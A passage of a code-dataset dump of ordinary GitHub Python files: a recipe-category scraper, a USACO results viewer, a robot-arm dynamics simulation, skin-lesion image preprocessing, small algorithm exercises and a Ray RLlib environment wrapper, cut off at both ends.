categories]\n meal = [\"https://www.epicurious.com/meal/\"+ cat.lower() for cat in categories]\n occasion = [\"https://www.epicurious.com/occasion/\"+ cat.lower() for cat in categories]\n technique = [\"https://www.epicurious.com/technique/\"+ cat.lower() for cat in categories]\n cusine = [\"https://www.epicurious.com/cusine/\"+ cat.lower() for cat in categories]\n ingredient = [\"https://www.epicurious.com/ingredient/\"+ cat.lower() for cat in categories]\n equipment = [\"https://www.epicurious.com/equipment/\"+ cat.lower() for cat in categories]\n location = [\"https://www.epicurious.com/location/\"+ cat.lower() for cat in categories]\n \n start_urls = ingredients+source+special_considerations+type_urls+tag+meal+occasion+technique+cusine+ingredient+equipment+location\n\n def parse(self, response):\n url = response.request.url\n cat_type = url.split(\".com/\")[-1].split(\"/\")[0]\n category = url.split(\"/\")[-1].split(\"?\")[0]\n\n # se encontrar a tag das receitas então é special-consideration\n if len(response.css(\".list_content\")) != 0:\n yield {\"type\":cat_type,\"url\":url,\"category\":category}\n \n \n","repo_name":"Ftspublicidade/Oncase-Receitas","sub_path":"scrapping_category_types.py","file_name":"scrapping_category_types.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28602781741","text":"import re, os, sys, json, getch\n\ndef compileUSACO():\n results = open(\"results.out\", \"r\")\n for i in range(8):\n _ = results.readline()\n\n def normalize(s):\n s = s.replace(\" \", \"\\t\")\n return re.sub(r'\\t+', '\\t', s)\n\n c1, c2, c3 = normalize(results.readline()).split()[-3:]\n\n compiled = {'intl': []}\n\n s = results.readline()\n while s[:11] != \"Pre-College\":\n s = normalize(s).split()\n country = s[0]\n year = s[1]\n name = s[2] + \" \" + s[3]\n score = s[4]\n c1s = \"\".join(s[5:15])\n c2s = \"\".join(s[15:25])\n c3s = \"\".join(s[25:35])\n result = {\"name\": name, \"year\": year, \"country\": country, \"score\": {\"total\": score, c1: c1s, c2: c2s, c3: c3s}}\n compiled['intl'].append(result)\n s = results.readline()\n\n with open(\"compiledResults.out\", \"w+\") as f:\n f.write(json.dumps(compiled, indent=4))\n\ndef optionChooser(again=False):\n try:\n if not again:\n print(\"USACO Results:\\n\\n(q) Quit\\n(0) Compile Results\\n(1) Get All Results\\n(2) Search\")\n chooser = getch.getch().lower()\n if chooser == '\\x7f':\n chooser = optionChooser(True)\n if chooser not in [\"q\", \"0\", \"1\", \"2\"]:\n print(\"Invalid Option, please try again.\")\n chooser = optionChooser(True)\n return chooser\n except ValueError:\n print(\"Invalid Option, please try again.\")\n chooser = optionChooser(True)\n\ndef optionChooser2(again=False):\n try:\n if not again:\n print(\"Search by?\\n\\n(b) Back\\n(n) Name\\n(s) Score\\n(c) Country\")\n chooser = getch.getch().lower()\n if chooser == '\\x7f':\n chooser = optionChooser2(True)\n if chooser not in [\"b\", \"n\", \"s\", \"c\"]:\n print(\"Invalid Option, please try again.\")\n chooser = optionChooser2(True)\n return chooser\n except ValueError:\n print(\"Invalid Option, please try again.\")\n chooser = optionChooser2(True)\n\ndef main(chooser=None, option=None):\n if not chooser:\n os.system(\"clear\")\n chooser = optionChooser()\n os.system(\"clear\")\n if chooser == \"q\":\n sys.exit(0)\n elif chooser == \"0\":\n compileUSACO()\n elif chooser == \"1\":\n try:\n with open(\"compiledResults.out\", \"r\") as f:\n print(f.read())\n chooser = getch.getch()\n os.system(\"clear\")\n except:\n compileUSACO()\n with open(\"compiledResults.out\", \"r\") as f:\n print(f.read())\n chooser = getch.getch()\n os.system(\"clear\")\n main()\n elif chooser == \"2\":\n if not option:\n option = optionChooser2()\n results = json.loads(open(\"compiledResults.out\").read())\n if option == \"b\":\n main()\n elif option == \"n\":\n s = \"\"\n ch = \"\"\n os.system(\"clear\")\n print(\"Name: \", end=\"\", flush=True)\n while ch != '\\n':\n ch = getch.getch()\n if ch == \"\\x7f\":\n s = s[:-1]\n if ch.isalpha() or ch == \" \":\n s += ch\n os.system('clear')\n print(\"Name: \" + s, end=\"\", flush=True)\n search = [result for result in results['intl'] if s.lower() == result[\"name\"].lower()]\n if len(search) == 0: search = [result for result in results['intl'] if s.lower() in result[\"name\"].lower()]\n os.system('clear')\n if len(search) == 0:\n print(\"Nothing was found. Go (h)ome.\")\n getch.getch()\n main()\n if len(search) == 1:\n score = search[0][\"score\"]\n total = search[0][\"score\"][\"total\"]\n score.pop(\"total\")\n print(\"Name: \"+search[0][\"name\"] + \"\\nYear: \" + search[0][\"year\"] + \"\\nCountry: \" + search[0][\"country\"] + \"\\nScore: \" + total)\n for key in score:\n print(\" \" + key + \": \" + score[key])\n getch.getch()\n main()\n else:\n print(\"There were multiple results. Which one?\\n\")\n for result in search:\n print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n try:\n getchr = int(getch.getch())\n if 1 <= int(getchr) <= len(search):\n i = int(getchr) - 1\n score = search[i][\"score\"]\n total = search[i][\"score\"][\"total\"]\n score.pop(\"total\")\n os.system(\"clear\")\n print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n for key in score:\n print(\" \" + key + \": \" + score[key])\n getch.getch()\n main()\n except:\n pass\n main(\"2\", \"n\")\n elif option == \"s\":\n s = \"\"\n ch = \"\"\n os.system(\"clear\")\n print(\"Score: \", end=\"\", flush=True)\n while ch != '\\n':\n ch = getch.getch()\n if ch == \"\\x7f\":\n s = s[:-1]\n if ch.isnumeric() or ch == \" \":\n s += ch\n os.system('clear')\n print(\"Score: \" + s, end=\"\", flush=True)\n search = [result for result in results['intl'] if s == result[\"score\"][\"total\"]]\n os.system('clear')\n print(str(len(search)) + \" number of people got this score:\\n\")\n for result in search:\n print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n try:\n getchr = \"\"\n while \"\\n\" not in getchr:\n ch = str(getch.getch())\n if ch == \"q\":\n getchr = \"\"\n break\n getchr += str(getch.getch())\n getchr.replace(\"\\n\", \"\")\n if 1 <= int(getchr) <= len(search):\n i = int(getchr) - 1\n score = search[i][\"score\"]\n total = search[i][\"score\"][\"total\"]\n score.pop(\"total\")\n os.system(\"clear\")\n print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n for key in score:\n print(\" \" + key + \": \" + score[key])\n getch.getch()\n main()\n except:\n pass\n main(\"2\", \"s\")\n elif option == \"c\":\n s = \"\"\n ch = \"\"\n os.system(\"clear\")\n print(\"Country Code: \", end=\"\", flush=True)\n while ch != '\\n':\n ch = getch.getch()\n if ch == \"\\x7f\":\n s = s[:-1]\n if ch.isalpha():\n s += ch\n os.system('clear')\n print(\"Country Code: \" + s, end=\"\", flush=True)\n search = [result for result in results['intl'] if s == result[\"country\"]]\n os.system('clear')\n print(str(len(search)) + \" number of people did this USACO contest from \" + s + \":\\n\")\n for result in search:\n print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n try:\n getchr = \"\"\n while \"\\n\" not in getchr:\n ch = str(getch.getch())\n if ch == \"q\":\n getchr = \"\"\n break\n getchr += str(getch.getch())\n getchr.replace(\"\\n\", \"\")\n if 1 <= int(getchr) <= len(search):\n i = int(getchr) - 1\n score = search[i][\"score\"]\n total = search[i][\"score\"][\"total\"]\n score.pop(\"total\")\n os.system(\"clear\")\n print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n for key in score:\n print(\" \" + key + \": \" + score[key])\n getch.getch()\n main()\n except:\n pass\n main(\"2\", \"c\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"PiAreSquared/USACO","sub_path":"December2019/B/Results/parseResults.py","file_name":"parseResults.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7430730387","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass Torque2LinksArmRobot:\n\n\n def __init__(self, l1:float, l2:float, lc1:float, lc2:float, m1:float, m2:float, theta_init:np.ndarray, theta_dot_init:np.ndarray, timestep:float=0.0167, color:str='black') -> None:\n # Retrieve the constructor arguments\n self.l1 = l1\n self.l2 = l2\n self.lc1 = lc1\n self.lc2 = lc2\n self.m1 = m1\n self.m2 = m2\n self.dt = timestep\n self.color = color\n self.max_length = l1 + l2\n self.g = 9.80665\n self.b1 = 0.09\n self.b2 = 0.07\n\n # Trajectory to follow\n self.KP_VAL = 0.0\n self.KI_VAL = 0.0\n self.KD_VAL = 0.0\n self.traj_exists = False\n self.traj_startpoint = (0, 0)\n self.traj_endpoint = (0, 0)\n self.last_x_e = np.array([\n [0.0],\n [0.0]\n ])\n self.int_x_e = np.array([\n [0.0],\n [0.0]\n ])\n\n # Calculate the approximate inertial moment I1 and I2 based on lc1 and lc2\n self.I1 = (0.667)*(m1*lc1*l1)\n self.I2 = (0.667)*(m2*lc2*l2)\n\n # Time and state variables\n self.iter = 0\n self.theta = [theta_init]\n self.theta_dot = [theta_dot_init]\n self.theta_ddot = []\n self.tau = []\n\n # Calculate constant values inside matrices\n # M matrix\n self.M11_const_a = m1*lc1**2 + m2*(l1**2 + lc2**2) + self.I1 + self.I2\n self.M11_const_b = 2.0*m2*l1*lc2\n self.M12_const_a = m2*lc2**2 + self.I2\n self.M12_const_b = m2*l1*lc2\n self.M21_const_a = self.M12_const_a\n self.M21_const_b = self.M12_const_b\n self.M22_const_a = m2*lc2**2 + self.I2\n self.M = lambda theta: np.array([\n [self.M11_const_a + self.M11_const_b*np.cos(theta[1].item()), self.M12_const_a + self.M12_const_b*np.cos(theta[1].item())],\n [self.M21_const_a + self.M21_const_b*np.cos(theta[1].item()), self.M22_const_a]\n ])\n\n # C matrix\n self.C_const = m2*l1*lc2\n self.C = lambda theta, theta_dot: np.array([\n [-2.0*self.C_const*np.sin(theta[1].item())*theta_dot[1].item(), -self.C_const*np.sin(theta[1].item())*theta_dot[1].item()],\n [self.C_const*np.sin(theta[1].item())*theta_dot[0].item(), 0]\n ])\n\n # b matrix\n self.b = np.array([\n [self.b1, 0],\n [0, self.b2]\n ])\n\n # G matrix\n self.G_const_a = m1*self.g*lc1 + m2*self.g*l1\n self.G_const_b = m2*self.g*lc2\n self.G = lambda theta: np.array([\n [self.G_const_a*np.cos(theta[0].item()) + self.G_const_b*np.cos(theta[0].item() + theta[1].item())],\n [self.G_const_b*np.cos(theta[0].item() + theta[1].item())]\n ])\n\n # Jacobian\n self.J = lambda theta : np.array([\n [-self.l1*np.sin(theta[0].item()) - self.l2*np.sin(theta[0].item()+theta[1].item()), -self.l2*np.sin(theta[0].item() + theta[1].item())],\n [self.l1*np.cos(theta[0].item()) + self.l2*np.cos(theta[0].item()+theta[1].item()), self.l2*np.cos(theta[0].item() + theta[1].item())]\n ])\n\n # Forward kinematics\n self.fk_x1 = lambda theta: np.array([\n [self.l1*np.cos(theta[0].item())], \n [self.l1*np.sin(theta[0].item())]\n ])\n self.fk_x2 = lambda theta: self.fk_x1(theta) + np.array([\n [self.l2*np.cos(theta[0].item() + theta[1].item())], \n [self.l2*np.sin(theta[0].item() + theta[1].item())]\n ])\n\n\n\n def setTrajectoryPoints(self, start_point:tuple, end_point:tuple, time:float) -> None:\n self.traj_exists = True\n self.traj_startpoint = start_point\n self.traj_endpoint = end_point\n self.traj_time = time\n\n\n\n def calcControlLaw(self) -> np.ndarray:\n if self.traj_exists:\n time = self.iter*self.dt\n\n # Trajectory\n s = (time/self.traj_time)**3.0\n s2 = 3.0*(time**2.0)/(self.traj_time**3.0)\n s3 = 6.0*(time)/(self.traj_time**3.0)\n if s >= 1.0: s = 1.0\n\n x_d = np.array([\n [self.traj_startpoint[0]*(1.0 - s) + self.traj_endpoint[0]*s],\n [self.traj_startpoint[1]*(1.0 - s) + self.traj_endpoint[1]*s]\n ])\n x_dot_d = np.array([\n [(self.traj_endpoint[0] - self.traj_startpoint[0])*s2],\n [(self.traj_endpoint[1] - self.traj_startpoint[1])*s2]\n ])\n x_ddot_d = np.array([\n [(self.traj_endpoint[0] - self.traj_startpoint[0])*s3],\n [(self.traj_endpoint[1] - self.traj_startpoint[1])*s3]\n ])\n\n # Calculate errors\n x_e = x_d - self.fk_x2(self.theta[self.iter])\n self.int_x_e += (self.last_x_e + x_e)*(self.dt*2.0)\n self.last_x_e = x_e\n theta_dot_e = np.linalg.inv(self.J(self.theta[self.iter]))@x_dot_d - self.theta_dot[self.iter]\n\n # Compute F\n F = x_ddot_d + self.KP_VAL*x_e + self.KI_VAL*(self.int_x_e)\n\n # Calculate the input\n return self.M(self.theta[self.iter])@(np.transpose(self.J(self.theta[self.iter]))@F + self.KD_VAL*theta_dot_e) + self.C(self.theta[self.iter], self.theta_dot[self.iter])@self.theta_dot[self.iter] + self.G(self.theta[self.iter])\n\n else:\n return np.array([\n [0.0],\n [0.0]\n ])\n\n\n\n def torqueInput(self, torques:np.ndarray) -> None:\n self.tau.append(torques)\n\n\n\n def stepSimulation(self) -> None:\n # Calculate theta_ddot\n theta = self.theta[self.iter]\n theta_dot = self.theta_dot[self.iter]\n tau = self.tau[self.iter]\n theta_ddot = np.linalg.inv(self.M(theta))@(tau - (self.C(theta, theta_dot) + self.b)@theta_dot - self.G(theta))\n self.theta_ddot.append(theta_ddot)\n\n # Compute theta and theta_dot\n new_theta_dot = theta_dot + theta_ddot*self.dt\n new_theta = theta + new_theta_dot*self.dt\n self.theta_dot.append(new_theta_dot)\n self.theta.append(new_theta)\n\n # Add iteration\n self.iter += 1\n\n\n\n def render(self) -> None:\n # Prepare the plot\n self.render_step = 0\n self.fig, self.ax = plt.subplots(1, 1)\n\n # Reshape the theta\n self.theta_1 = [theta[0].item() for theta in self.theta]\n self.theta_2 = [theta[1].item() for theta in self.theta]\n\n # Calculate the point of each joints\n self.joint1_x = [self.l1*np.cos(theta_1) for theta_1 in self.theta_1]\n self.joint1_y = [self.l1*np.sin(theta_1) for theta_1 in self.theta_1]\n self.joint2_x = []\n self.joint2_y = []\n for i in range(self.iter):\n self.joint2_x.append(self.joint1_x[i] + self.l2*np.cos(self.theta_1[i] + self.theta_2[i]))\n self.joint2_y.append(self.joint1_y[i] + self.l2*np.sin(self.theta_1[i] + self.theta_2[i]))\n\n\n\n def stepPlay(self) -> None:\n if self.render_step < self.iter:\n # Clear the axis\n self.ax.clear()\n\n # Define the joints\n plt.title('2-Links Arm Dynamics Simulation')\n self.ax.set_xlim(-self.max_length, self.max_length, auto=False)\n self.ax.set_ylim(-self.max_length, self.max_length, auto=False)\n self.ax.set_xlabel('x-axis')\n self.ax.set_ylabel('y-axis')\n self.ax.set_aspect('equal')\n self.ax.plot([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], s=200, c=self.color)\n self.ax.plot([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], s=200, c=self.color)\n\n if self.traj_exists:\n self.ax.plot([self.traj_startpoint[0], self.traj_endpoint[0]], [self.traj_startpoint[1], self.traj_endpoint[1]], lw=3, c='b')\n\n # Increment the render step\n self.render_step += 1\n\n\n\nclass Velocity2LinksArmRobot:\n\n\n def __init__(self, l1:float, l2:float, theta_init:np.ndarray, timestep:float=0.0167, color:str='black') -> None:\n # Retrieve the constructor arguments\n self.l1 = l1\n self.l2 = l2\n self.theta = [theta_init]\n self.theta_dot = []\n self.dt = timestep\n self.color = color\n self.max_length = l1 + l2\n\n # Iteration\n self.iter = 0\n\n # Initial conditions\n self.fk_x1 = lambda theta: np.array([[-self.l1*np.sin(theta[0].item())], [self.l1*np.cos(theta[0].item())]])\n self.fk_x2 = lambda theta: self.fk_x1(theta) + np.array([[-self.l2*np.sin(theta[0].item() + theta[1].item())], [self.l2*np.cos(theta[0].item() + theta[1].item())]])\n self.x1 = [self.fk_x1(self.theta[0])]\n self.x2 = [self.fk_x2(self.theta[0])]\n\n # Jacobian\n self.J = lambda theta : np.array([\n [-self.l1*np.cos(theta[0].item())-self.l2*np.cos(theta[0].item()+theta[1].item()), -self.l2*np.cos(theta[0].item() + theta[1].item())],\n [-self.l1*np.sin(theta[0].item())-self.l2*np.sin(theta[0].item()+theta[1].item()), -self.l2*np.sin(theta[0].item() + theta[1].item())]\n ])\n\n\n\n def velocityInput(self, theta_dot:np.ndarray) -> None:\n self.theta_dot.append(theta_dot)\n\n\n\n def stepSimulation(self) -> None:\n # Calculate the next theta\n self.theta.append(self.theta[self.iter] + self.theta_dot[self.iter]*self.dt)\n\n # Add iteration\n self.iter += 1\n\n # Compute next task space\n self.x1.append(self.fk_x1(self.theta[self.iter]))\n self.x2.append(self.fk_x2(self.theta[self.iter]))\n\n\n\n def render(self) -> None:\n # Prepare the plot\n self.render_step = 0\n self.fig, self.ax = plt.subplots(1, 1)\n\n # Reshape the theta\n self.theta_1 = [theta[0].item() for theta in self.theta]\n self.theta_2 = [theta[1].item() for theta in self.theta]\n\n # Reshape the task spaces\n self.joint1_x = [x1[0].item() for x1 in self.x1]\n self.joint1_y = [x1[1].item() for x1 in self.x1]\n self.joint2_x = [x2[0].item() for x2 in self.x2]\n self.joint2_y = [x2[1].item() for x2 in self.x2]\n\n\n\n def stepPlay(self) -> None:\n if self.render_step < self.iter:\n # Clear the axis\n self.ax.clear()\n\n # Define the joints\n plt.title('2-Links Arm Kinematics Simulation')\n self.ax.set_xlim(-self.max_length, self.max_length, auto=False)\n self.ax.set_ylim(-self.max_length, self.max_length, auto=False)\n self.ax.set_xlabel('x-axis')\n self.ax.set_ylabel('y-axis')\n self.ax.set_aspect('equal')\n self.ax.plot([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], s=200, c=self.color)\n self.ax.plot([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], s=200, c=self.color)\n\n # Increment the render step\n self.render_step += 1","repo_name":"dhonanhibatullah/python_modules","sub_path":"twolinksarmrobot_sim.py","file_name":"twolinksarmrobot_sim.py","file_ext":"py","file_size_in_byte":12162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13220436380","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport cv2\nfrom PIL import Image\nimport tensorflow\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, array_to_img, load_img\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\ndata = pd.read_csv('E:\\BeCodeProjects\\Mole_Detection_Project\\Dataset\\data\\CLIN_DIA.csv', encoding='latin')\ndata = data.dropna()\ndata['kat.Diagnose'] = data['kat.Diagnose'].replace([0, 1], 0).replace([2, 3], 1)\n# print(data)\n\nimages = os.listdir('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef')\n# creating list\nbenign = []\nmalignant = []\n\nimg_ids = []\nfor image in images:\n img_id = image # .lower()#.split#('.')#.lower()\n img_ids.append(img_id)\n\n# separating images based on danger(1.0) or no-danger(0.0) states\nfor i in range(len(images)):\n if data['kat.Diagnose'][i] == 0.0:\n benign.append(img_ids[i])\n elif data['kat.Diagnose'][i] == 1.0:\n malignant.append(img_ids[i])\n\nfor benign_data in benign:\n f = Image.open('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef/' + benign_data)\n #f.save('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set/benign/' + benign_data)\n\n# saves malignant images from original folder to newly created folder for malignant category\nfor malignant_data in malignant:\n f = Image.open('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef/' + malignant_data)\n #f.save('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set/malignant/' + malignant_data)\n\n# Data augmentation on training data and validation data\nbatch_size = 32\ntrain_datagen = ImageDataGenerator(rescale=1. / 255.0,\n shear_range=0.2,\n zoom_range=0.2,\n width_shift_range=0.1,\n height_shift_range=0.1,\n horizontal_flip=True,\n validation_split=0.2)\n\nvalid_datagen = ImageDataGenerator(rescale=1. / 255.0,\n shear_range=0.2,\n zoom_range=0.2,\n width_shift_range=0.1,\n height_shift_range=0.1,\n horizontal_flip=True,\n validation_split=0.2)\ntest_datagen = ImageDataGenerator(rescale=1. / 255.0)\ntraining_generator = train_datagen.flow_from_directory(r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set',\n target_size=(128, 128), # resize image,\n batch_size=32,\n save_to_dir=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/resized',\n save_format='bmp',\n shuffle=True,\n seed=42,\n subset='training',\n class_mode='binary')\nvalid_generator = valid_datagen.flow_from_directory(directory=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set',\n target_size=(128, 128),\n subset='validation',\n batch_size=32,\n class_mode=\"binary\",\n shuffle=True,\n seed=42)\n\"\"\"\ntest_generator=test_datagen.flow_from_directory(directory=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/test',\n target_size=(128, 128),\n\n batch_size=32,\n class_mode=\"binary\",\n shuffle=True,\n seed=42)\n\"\"\"\n","repo_name":"manasanoolu7/Mole_Detection_Project","sub_path":"preprocess/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36212546951","text":"def get_prime_table(n):\n sieve = [False, False] + [True] * (n - 1)\n m = int(n ** 0.5)\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\nif __name__ == '__main__':\n inputs = []\n while True:\n num = int(input())\n if num == 0:\n break\n inputs.append(num)\n prime_table = get_prime_table(max(inputs) * 2)\n for i_num in inputs:\n count = 0\n for num in range(i_num + 1, i_num * 2 + 1):\n if prime_table[num]:\n count += 1\n print(count)\n","repo_name":"kjb4494/baekjoon","sub_path":"python3/09.기본 수학 2/4948.py","file_name":"4948.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24439546593","text":"from typing import Any, Callable, Dict, Optional, Sequence, Tuple, Union, cast\nfrom typing_extensions import TypedDict\nfrom gym import spaces\nimport numpy as np\n\nfrom ray.rllib.env import MultiAgentEnv\nfrom ray.rllib.env.multi_agent_env import make_multi_agent\nfrom ray.rllib.utils.typing import AgentID\nfrom ray.tune.registry import _global_registry, ENV_CREATOR, register_env\n\n\nclass LatentWrapperConfig(TypedDict):\n env: str\n \"\"\"Name of the environment to wrap.\"\"\"\n\n env_config: dict\n \"\"\"Configuration to be passed to the wrapped environment.\"\"\"\n\n latent_dist: Callable[[], np.ndarray]\n \"\"\"Thunk to use to draw random variables.\"\"\"\n\n episodes_per_latent: int\n \"\"\"Number of episodes that should be played for each latent vector sampled.\"\"\"\n\n agents_with_latent: Sequence[AgentID]\n \"\"\"The set of agent IDs for which latent vectors should be appended.\"\"\"\n\n random_policy_dist: Optional[Callable[[int], np.ndarray]]\n \"\"\"If this is not None, then also append the action probabilities at the current\n state of a random policy. This function should take a seed and return a random\n draw which is deterministic given the seed.\"\"\"\n\n use_tuple: bool\n \"\"\"Add latents as the second element of an obervation tuple instead of concatenating\n it to the observation tensor.\"\"\"\n\n\nObsWithLatent = Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]\n\n\nclass LatentEnvWrapper(MultiAgentEnv):\n \"\"\"\n Environment wrapper that appends a latent vector to the observations for each\n episode. It will maintain the same latent vector for a certain number of episodes\n before switching to a new one.\n \"\"\"\n\n base_env: MultiAgentEnv\n config: LatentWrapperConfig\n\n current_latent: np.ndarray\n current_latent_id: int\n episodes_with_current_latent: int\n\n def __init__(self, config: LatentWrapperConfig):\n base_env_name = config[\"env\"]\n base_env_config = config[\"env_config\"]\n env_creator = _global_registry.get(ENV_CREATOR, base_env_name)\n base_env = env_creator(base_env_config)\n if isinstance(base_env, MultiAgentEnv):\n self.base_env = base_env\n else:\n env_creator = make_multi_agent(env_creator)\n self.base_env = env_creator(base_env_config)\n\n self.config = config\n self.config.setdefault(\"random_policy_dist\", None)\n self.config.setdefault(\"use_tuple\", False)\n\n if hasattr(self.base_env, \"observation_space\"):\n total_latent_size = self.config[\"latent_dist\"]().shape[0]\n if self.config[\"random_policy_dist\"] is not None:\n total_latent_size += self.config[\"random_policy_dist\"](0).shape[0]\n if self.config[\"use_tuple\"]:\n base_obs_space: spaces.Space = cast(\n Any, self.base_env\n ).observation_space\n latent_bound = np.inf * np.ones(total_latent_size)\n latent_space = spaces.Box(low=-latent_bound, high=latent_bound)\n self.observation_space = spaces.Tuple((base_obs_space, latent_space))\n else:\n base_obs_space_box: spaces.Box = cast(\n Any, self.base_env\n ).observation_space\n latent_bound = np.ones(\n base_obs_space_box.shape[:-1] + (total_latent_size,)\n )\n self.observation_space = spaces.Box(\n low=np.concatenate(\n [base_obs_space_box.low, latent_bound * -np.inf], axis=-1\n ),\n high=np.concatenate(\n [base_obs_space_box.high, latent_bound * np.inf], axis=-1\n ),\n )\n\n self.action_space = self.base_env.action_space\n\n self._sample_latent()\n\n def __getattr__(self, name: str) -> Any:\n # Pass through any attribute accesses to the base env.\n return getattr(self.base_env, name)\n\n def _sample_latent(self) -> None:\n self.current_latent = self.config[\"latent_dist\"]()\n self.current_latent_id = hash(np.random.random())\n self.episodes_with_current_latent = 0\n\n def reset(self):\n if self.episodes_with_current_latent >= self.config[\"episodes_per_latent\"]:\n self._sample_latent()\n self.episodes_with_current_latent += 1\n\n base_obs = self.base_env.reset()\n return self._append_latent_to_obs_dict(base_obs)\n\n def step(self, action_dict):\n base_obs, base_reward, base_done, base_infos = self.base_env.step(action_dict)\n\n return (\n self._append_latent_to_obs_dict(base_obs),\n base_reward,\n base_done,\n base_infos,\n )\n\n def _append_latent_to_obs_dict(\n self,\n obs_dict: Dict[AgentID, np.ndarray],\n ) -> Dict[AgentID, ObsWithLatent]:\n obs_dict_with_latent: Dict[AgentID, ObsWithLatent] = {}\n for agent_id, obs in obs_dict.items():\n if agent_id in self.config[\"agents_with_latent\"]:\n obs_dict_with_latent[agent_id] = self._append_latent_to_obs(obs)\n else:\n obs_dict_with_latent[agent_id] = obs\n return obs_dict_with_latent\n\n def _append_latent_to_obs(self, obs: np.ndarray) -> ObsWithLatent:\n latent_to_append = self.current_latent\n\n if self.config[\"random_policy_dist\"] is not None:\n obs_hash = hash(obs.data.tobytes())\n random_policy_action_probs = self.config[\"random_policy_dist\"](\n obs_hash + self.current_latent_id\n )\n latent_to_append = np.concatenate(\n [latent_to_append, random_policy_action_probs]\n )\n\n if self.config[\"use_tuple\"]:\n return (obs, latent_to_append)\n else:\n latent_to_append = latent_to_append[\n (np.newaxis,) * (obs.ndim - self.current_latent.ndim) + (slice(None),)\n ]\n latent_to_append = np.broadcast_to(\n latent_to_append,\n obs.shape[:-1] + (latent_to_append.shape[-1],),\n )\n return cast(np.ndarray, np.concatenate([obs, latent_to_append], axis=-1))\n\n\nregister_env(\"latent_wrapper\", lambda config: LatentEnvWrapper(config))\n","repo_name":"cassidylaidlaw/boltzmann-policy-distribution","sub_path":"bpd/envs/latent_wrapper.py","file_name":"latent_wrapper.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"70092348587","text":"class Solution:\n def findGCD(self, nums: List[int]) -> int:\n nums.sort()\n smallNum = nums[0]\n bigNum = nums[len(nums) -1]\n i = smallNum\n while i >= 1 :\n if bigNum / i % 1 == 0 and smallNum / i % 1 == 0:\n return i;\n i = i -1\n return 1;","repo_name":"BaseBenjamin13/leetcode","sub_path":"1979-find-greatest-common-divisor-of-array/1979-find-greatest-common-divisor-of-array.py","file_name":"1979-find-greatest-common-divisor-of-array.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33383204854","text":"import logging\n\nfrom modis import main\nfrom . import api_rocketleaguestats, ui_embed\n\nlogger = logging.getLogger(__name__)\n\nALIAS_STEAM = [\"steam\", \"pc\"]\nALIAS_PS = [\"ps\", \"psn\", \"playstation\", \"ps4\", \"playstation4\"]\nALIAS_XBOX = [\"xbox\", \"xb\", \"xb1\", \"xbone\", \"xboxone\", \"xbox1\"]\n\n\nasync def on_command(root, aux, query, msgobj):\n if root == \"rlstats\":\n await msgobj.channel.trigger_typing()\n\n if not aux:\n platform = \"steam\"\n elif aux[0] in ALIAS_STEAM:\n platform = \"steam\"\n elif aux[0] in ALIAS_PS:\n platform = \"ps\"\n elif aux[0] in 